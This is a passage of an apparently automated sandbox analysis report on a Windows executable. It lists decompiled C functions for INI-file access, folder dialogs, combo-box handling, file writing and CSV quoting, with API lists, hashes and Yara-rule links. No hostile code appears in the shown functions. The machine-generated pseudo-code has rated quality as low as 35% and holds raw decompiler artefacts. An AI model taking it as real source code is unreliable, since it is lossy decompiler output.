                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1865533344-0
                                                                                                                • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                                • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 35%
                                                                                                                			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20);
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}










                                                                                                                0x00409ddc
                                                                                                                0x00409de4
                                                                                                                0x00409df0
                                                                                                                0x00409df5
                                                                                                                0x00409df6
                                                                                                                0x00409e03
                                                                                                                0x00409e05
                                                                                                                0x00409e06
                                                                                                                0x00409e3b
                                                                                                                0x00409e5d
                                                                                                                0x00409e6a
                                                                                                                0x00409e73
                                                                                                                0x00409e75
                                                                                                                0x00409e08
                                                                                                                0x00409e08
                                                                                                                0x00409e19
                                                                                                                0x00409e37
                                                                                                                0x00409e37
                                                                                                                0x00409e81

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00409E08
                                                                                                                  • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                                  • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                                • memset.MSVCRT ref: 00409E3B
                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1127616056-0
                                                                                                                • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                                • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                                                0x0040ad06
                                                                                                                0x0040ad0a
                                                                                                                0x0040ad0c
                                                                                                                0x0040ad14
                                                                                                                0x0040ad19
                                                                                                                0x0040ad1f
                                                                                                                0x0040ad23
                                                                                                                0x0040ad27
                                                                                                                0x0040ad2a
                                                                                                                0x0040ad2d
                                                                                                                0x0040ad34
                                                                                                                0x0040ad3b
                                                                                                                0x0040ad3e
                                                                                                                0x0040ad44
                                                                                                                0x0040ad48
                                                                                                                0x0040ad4a
                                                                                                                0x0040ad52
                                                                                                                0x0040ad5a
                                                                                                                0x0040ad64
                                                                                                                0x0040ad65
                                                                                                                0x0040ad6b
                                                                                                                0x0040ad6c
                                                                                                                0x0040ad73
                                                                                                                0x0040ad76
                                                                                                                0x0040ad7c
                                                                                                                0x0040ad7c
                                                                                                                0x0040ad7f
                                                                                                                0x0040ad84

                                                                                                                APIs
                                                                                                                • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                                • wcscpy.MSVCRT ref: 0040AD65
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3917621476-0
                                                                                                                • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                                • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                                                                0x00404a62
                                                                                                                0x00404a6a
                                                                                                                0x00404a6e
                                                                                                                0x00404a71
                                                                                                                0x00404a74
                                                                                                                0x00404a92
                                                                                                                0x00404a92
                                                                                                                0x00404a76
                                                                                                                0x00404a76
                                                                                                                0x00404a87
                                                                                                                0x00404a90
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00404a90
                                                                                                                0x00404aa3
                                                                                                                0x00404aa7
                                                                                                                0x00404aa7
                                                                                                                0x00404a94
                                                                                                                0x00404a98

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32 ref: 00404A52
                                                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Item
                                                                                                                • String ID:
                                                                                                                • API String ID: 3888421826-0
                                                                                                                • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                                • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}






                                                                                                                0x004072e0
                                                                                                                0x004072f7
                                                                                                                0x004072fd
                                                                                                                0x00407316
                                                                                                                0x00407342

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004072FD
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                                • strlen.MSVCRT ref: 00407328
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2754987064-0
                                                                                                                • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                                • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                                                0x00408dd0
                                                                                                                0x00408dd2
                                                                                                                0x00408de2
                                                                                                                0x00408df4
                                                                                                                0x00408e01
                                                                                                                0x00408e1b
                                                                                                                0x00408e21
                                                                                                                0x00408e28
                                                                                                                0x00408e30
                                                                                                                0x00408dd4
                                                                                                                0x00408dd8
                                                                                                                0x00408dd8

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                • String ID:
                                                                                                                • API String ID: 1386444988-0
                                                                                                                • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                                • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}








                                                                                                                0x004050e1
                                                                                                                0x004050ec
                                                                                                                0x004050ee
                                                                                                                0x004050f5
                                                                                                                0x004050ff
                                                                                                                0x00405114
                                                                                                                0x00405118
                                                                                                                0x00405123
                                                                                                                0x00405128
                                                                                                                0x00405101
                                                                                                                0x00405109
                                                                                                                0x0040510f
                                                                                                                0x0040512e

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcslen$wcscatwcsncat
                                                                                                                • String ID:
                                                                                                                • API String ID: 291873006-0
                                                                                                                • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                                • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}









                                                                                                                0x00402de0
                                                                                                                0x00402de2
                                                                                                                0x00402dec
                                                                                                                0x00402def
                                                                                                                0x00402dfb
                                                                                                                0x00402e0c
                                                                                                                0x00402e0e
                                                                                                                0x00402e0e
                                                                                                                0x00402e16
                                                                                                                0x00402e18
                                                                                                                0x00402e1a
                                                                                                                0x00402e21

                                                                                                                APIs
                                                                                                                • GetClientRect.USER32 ref: 00402DEF
                                                                                                                • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                  • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                                  • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4235085887-0
                                                                                                                • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                                • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}







                                                                                                                0x0040b6a6
                                                                                                                0x0040b6ad
                                                                                                                0x0040b6af
                                                                                                                0x0040b6b0
                                                                                                                0x0040b6b5
                                                                                                                0x0040b6b6
                                                                                                                0x0040b6bd
                                                                                                                0x0040b6bf
                                                                                                                0x0040b6c0
                                                                                                                0x0040b6c5
                                                                                                                0x0040b6c6
                                                                                                                0x0040b6cd
                                                                                                                0x0040b6cf
                                                                                                                0x0040b6d0
                                                                                                                0x0040b6d5
                                                                                                                0x0040b6d6
                                                                                                                0x0040b6dd
                                                                                                                0x0040b6df
                                                                                                                0x0040b6e0
                                                                                                                0x00000000
                                                                                                                0x0040b6e5
                                                                                                                0x0040b6e6

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                                • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}























                                                                                                                0x00407362
                                                                                                                0x00407369
                                                                                                                0x0040736e
                                                                                                                0x00407371
                                                                                                                0x00407378
                                                                                                                0x0040737e
                                                                                                                0x00407381
                                                                                                                0x00407386
                                                                                                                0x0040739f
                                                                                                                0x00407388
                                                                                                                0x00407391
                                                                                                                0x00407391
                                                                                                                0x004073a4
                                                                                                                0x004073ac
                                                                                                                0x004073ad
                                                                                                                0x004073cd
                                                                                                                0x004073d0
                                                                                                                0x004073d3
                                                                                                                0x004073d6
                                                                                                                0x004073e0
                                                                                                                0x004073e7
                                                                                                                0x004073ee
                                                                                                                0x004073f5
                                                                                                                0x0040741a
                                                                                                                0x0040741a
                                                                                                                0x0040741d
                                                                                                                0x00407420
                                                                                                                0x00407423
                                                                                                                0x00407426
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004073fc
                                                                                                                0x00407400
                                                                                                                0x0040740f
                                                                                                                0x00407412
                                                                                                                0x00407412
                                                                                                                0x00407402
                                                                                                                0x00407402
                                                                                                                0x00407407
                                                                                                                0x00407407
                                                                                                                0x00407413
                                                                                                                0x00407419
                                                                                                                0x00407419
                                                                                                                0x00407419
                                                                                                                0x0040742f
                                                                                                                0x00407434
                                                                                                                0x00407437
                                                                                                                0x00407439
                                                                                                                0x0040743b
                                                                                                                0x0040743b
                                                                                                                0x0040744e
                                                                                                                0x00407453
                                                                                                                0x00407453
                                                                                                                0x004073af
                                                                                                                0x004073b2
                                                                                                                0x004073ba
                                                                                                                0x004073bb
                                                                                                                0x00000000
                                                                                                                0x004073bd
                                                                                                                0x004073c3
                                                                                                                0x004073c3
                                                                                                                0x004073bb
                                                                                                                0x0040745c
                                                                                                                0x00407468
                                                                                                                0x00407468
                                                                                                                0x0040746d
                                                                                                                0x00407473
                                                                                                                0x0040747c
                                                                                                                0x0040748e

                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 004073A4
                                                                                                                • wcschr.MSVCRT ref: 004073B2
                                                                                                                  • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                                  • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                • String ID: "
                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                                • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

